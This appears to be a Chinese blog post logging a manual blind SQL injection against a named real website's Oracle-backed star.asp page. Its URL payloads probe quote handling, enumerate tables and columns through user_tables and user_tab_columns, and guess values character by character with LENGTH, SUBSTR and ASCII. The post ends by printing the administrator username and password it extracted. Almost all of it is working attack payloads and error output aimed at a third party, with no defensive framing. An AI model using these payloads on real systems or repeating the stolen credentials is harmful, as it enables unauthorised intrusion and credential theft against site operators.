http://et.kpworld.com/star.asp?performer=马三立;
——————————————————
OraOLEDB 错误 ’80040e14′ ORA-00911: 
invalid character 
/star.asp,行83 

说明过滤了分号。

http://et.kpworld.com/star.asp?performer=马三立’
—————————————————-
OraOLEDB 错误 ’80004005′ ORA-01756: 
括号内的字符串没有正确结束 
/star.asp,行83 

看来存在未过滤单引号问题。

http://et.kpworld.com/star.asp?performer=马三立’ and ’1′=’1
—————————————————————-
闭和他单引号,正常返回。

and 0<>(select count(*) from admin) and  ’1′=’1
—————————————————————–
OraOLEDB 错误 ’80040e37′ ORA-00942: 
table or view does not exist 
/star.asp,行83 

说明不存在ADMIN这个表.
******************************************************************

下面需要知道ORACLE的系统表:

确定表中行的总数:

select num_rows from user_tables where table_name=’表名 ———————-存放当前用户所有表
where table_name=’表名
’selectcolumn_name,
from user_tab_columns ———————–存放所有列
where table_name=’表名’

and 0<>(select count(*) from all_tables) and  ’1′=’1
———————————————————————
存在!
all_tables是一个系统表,用来存放当前ID和其他用户的所有表

and 0<>(select count(*) from user_tables) and  ’1′=’1
———————————————————————

返回。有这个系统表,这个表存放当前用户的所有表

and 0<>(select top 1 table_name from user_tables) and  ’1′=’1
———————————————————————————
OraOLEDB 错误 ’80040e14′ ORA-00923: 
FROM keyword not found where expected 
/star.asp,行83 

不支持TOP 1 ?。。。。。。这种解释好象不太理想。。。
(经过PINKEYES测试已经确定确实不支持TOP 1)

and 0<>(select count(*) from user_tables where table_nam<>”) and  ’1′=’1
——————————————————————————————–

OraOLEDB 错误 ’80040e14′ ORA-00904: 
invalid column name /star.asp,行83

当语法错误时,会显示无效列名字

and 0<>(select count(*) from user_tables where table_name<>””) and ’1′=’1
——————————————————————————————–

语法正确时,成功返回标志,看来四个单引号表示空.接下来是对一些函数的测试:

and 0<>(select count(*) from user_tables where sum(table_name)>1) and ’1′=’1
————————————————————————————————

OraOLEDB 错误 ’80040e14′ ORA-00934: 
group function is not allowed here 
/star.asp,行83 
组函数不允许在这里。

and 0<>(select count(*) from user_tables where avg(table_name)) and ’1′=’1
——————————————————————————————-

OraOLEDB 错误 ’80040e14′ ORA-00934: 
group function is not allowed here /star.asp,行83

组函数不允许在这里。

and 0<>(select to_char(table_name) from user_tables) and%20′1′=’1
————————————————————————–

OraOLEDB 错误 ’80004005′ ORA-01427: 
single-row subquery returns more than one row 
/star.asp,行83 
单行的子查询返回多于一行

and 0<>(select count(*) from user_tables where table_name+1) and%20′1′=’1
————————————————————————–

OraOLEDB 错误 ’80040e14′ ORA-00920: 
invalid relational operator 
/star.asp,行83 

测试到这里,下面看看怎么弄出他的表来:

and 0<>(select count(*) from performer) and%20′1′=’1
—————————————————–

成功返回。这里的表是看前面URL猜的.

and 0<>(select count(*) from user_tables where table_name=’performer’) and%20′1′=’1
————————————————————————————-
没返回。失败标志。

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name=’PERFORMER’) and%20′1′=’1
————————————————————————————————

成功了! 看来这个user_tables表只认识大写字母!

and 0<>(select count(*) from user_tables where length(table_name)>10) and%20′1′=’1
————————————————————————————

用length函数确定最长表的位数

and 0<>(select count(*) from user_tables where length(table_name)=18) and%20′1′=’1
————————————————————————————-

省略若干步骤,最后确定最长表为18位。

and 0<>(select count(*) from user_tables where substr(table_name,1,1)=’A') and%20′1′=’1
—————————————————————————————–

第一位为’A',

and 0<>(select count(*) from user_tables where substr(table_name,1,2)=’AD’) and%20′1′=’1
—————————————————————————————–

第二位为’AD’

and 0<>(select count(*) from user_tables where substr(table_name,1,18)=’ADMINAUTHORIZATION’) and%20′1′=’1
———————————————————————————————
省略若干,18位的表名为’ADMINAUTHORIZATION’。

and 1=(select count(*) from user_tables where table_name=’ADMINAUTHORIZATION’) and%20′1′=’1
——————————————————————————————–
返回。

and 0<>(select count(*) from user_tables where length(table_name)=2) and%20′1′=’1
———————————————————————————-

最小表名长度为2

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25user%25′)%20and%20%20′1′=’1
————————————————————————————————-

没返回。

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25ADMIN%25′)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25PER%25′) and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25BBS%25′)%20and%20′1′=’1
————————————————————————————————-

都成功返回。看来可以利用LIKE猜。

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like’%25BBS%25′%20and%20length(table_name)>8) and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like’%25BBS%25′%20and%20length(table_name)>10)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like’%25BBS%25′%20and%20length(table_name)=10)%20and%20′1′=’1
————————————————————————————————-
利用LIKE和LENGTH组合猜,马上就能确定长度。

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)=’BBSS’)%20and%20′1′=’1
————————————————————————————————-
猜出第四位是S。接下来就是重复劳动了。

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)=’BBSSUBJECT’)%20and%20′1′=’1
————————————————————————————————-
猜出来了。’BBSSUBJECT’

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’BBSSUBJECT’%20and%20column_name%20like%20′%25USER%25′)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’BBSSUBJECT’%20and%20column_name%20like%20′%25USER%25′)%20and%20′1′=’1
————————————————————————————————-

没返回,不象是保存用户和密码的表。再来。。。

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25USER%25′)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25USER%25′%20and%20length(table_name)>10)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25USER%25′%20and%20length(table_name)>15)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20′%25USER%25′%20and%20length(table_name)=15)%20and%20′1′=’1
————————————————————————————————-

确定长度为15。

and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,1)=’U'%20and%20length(table_name)=15)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,2,1)=’S'%20and%20length(table_name)=15)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,-4,4)=’USER’%20and%20length(table_name)=15)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20length(table_name)=15%20and%20substr(table_name,-15,15)=’UNSUBSCRIBEUSER’)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name=’UNSUBSCRIBEUSER’)%20and%20′1′=’1
————————————————————————————————-

确定表名’UNSUBSCRIBEUSER’,接下来猜是否有密码字段。。。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’UNSUBSCRIBEUSER’%20and%20column_name%20like%20′%25USER%25′)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’UNSUBSCRIBEUSER’%20and%20column_name%20like%20′%25PASS%25′)%20and%20′1′=’1
————————————————————————————————-
LIKE PASS,没返回,郁闷,继续。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20′%25PASS%25′%20and%20length(table_name)=13)%20and%20′1′=’1
————————————————————————————————-
返回。不准确。

————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-2,2)=’SS’) and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,6,2)=’SS’)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=’PASS’) and%20′1′=’1
————————————————————————————————-
这里用SUBSTR缩小范围.

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,4)=’PASS’%20and%20length(column_name)=11)%20and%20′1′=’1
————————————————————————————————-

含有PASS字段的字段长度11位。根据上面的从4位开始数4位是PASS 那么PASS前是3位,后是4位,一共是11位。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,4,8)=’PASSWORD’)%20and%20′1′=’1
————————————————————————————————-

猜一下,果然是。。。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20substr(column_name,-11,11)=’STRPASSWORD’)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’%20and%20length(table_name)=13)
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’%20and%20length(table_name)=13)%20and%20′1′=’1
————————————————————————————————-

全返回,确定密码字段名字’STRPASSWORD’。把密码字段抓到就好办了,再利用他抓表名:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’%20and%20length(table_name)=13) and ’1′=’1
————————————————————————————————-

返回,和上面猜出的表名长度符合。用SUBSTR猜出他名字:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’%20and%20substr(table_name,1,13)=’ADMINISTRATOR’) and ’1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name=’STRPASSWORD’%20and%20table_name=’ADMINISTRATOR’) and ’1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name=’ADMINISTRATOR’) and ’1′=’1
————————————————————————————————-

全返回,确定表名为:’ADMINISTRATOR’.

and%208=(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’) and ’1′=’1
————————————————————————————————-

猜出表里有8个字段。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20column_name%20like%20′%25ID%25′)%20and%20′1′=’1
————————————————————————————————-
and%203=(select%20count(*)%20from%20ADMINISTRATOR) and ’1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,4,2)=’ID’)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,-2,2)=’ID’)%20and%20′1′=’1
————————————————————————————————-
可以判断是ID结尾了,长度为5。

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,-5,5)=’LNGID’)%20and%20′1′=’1
————————————————————————————————-
and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20column_name=’LNGID’)%20and%20′1′=’1
————————————————————————————————-
出来了,LNGID。

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(LNGID)=2)%20and%20′1′=’1
————————————————————————————————-
and%208=(select%20min(LNGID)%20from%20ADMINISTRATOR)%20and%20′1′=’1
————————————————————————————————-
and%2021=(select%20max(LNGID)%20from%20ADMINISTRATOR)%20and%20′1′=’1
————————————————————————————————-
最小ID,最大ID也出来,接下来弄密码

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20length(STRPASSWORD)=4%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-
LNGID为8的密码长度为4

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,1,1))=116%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-
第一位
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,2,1))=101%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-
第二位
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,3,1))=115%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-
第三位
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20ascii(substr(STRPASSWORD,4,1))=116%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-
第四位

STRPASSWORD:test

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=’test’%20and%20LNGID=8)%20and%20′1′=’1
————————————————————————————————-

OH,YEAH~~密码出来了。

接着搞用户名:

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20column_name%20like%20′%25NAME%25′)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,4,4)=’NAME’)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,-4,4)=’NAME’)%20and%20′1′=’1
————————————————————————————————-

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20substr(column_name,1,7)=’STRNAME’)%20and%20′1′=’1
————————————————————————————————-

出来了,字段:STRNAME

and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name=’ADMINISTRATOR’%20and%20column_name%20not%20in(‘STRNAME’,'STRPASSWORD’,'LNGID’))%20and%20′1′=’1 
————————————————————————————————-
and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=’test’%20and%20LNGID=8%20and%20length(STRNAME)=4)%20and%20′1′=’1
————————————————————————————————-
STRNAME值长度为4,不会是和密码相同吧。。。

and%200<>(select%20count(*)%20from%20ADMINISTRATOR%20where%20STRPASSWORD=’test’%20and%20LNGID=8%20and%20STRNAME=’test’)%20and%20′1′=’1
————————————————————————————————-
呵呵,果然。


表名ADMINISTRATOR,列名:STRNAME,STRPASSWORD,LNGID


LNGID=8 STRNAME=test STRPASSWORD=test


2条评论

该日志第一篇评论

发表评论

评论也有版权!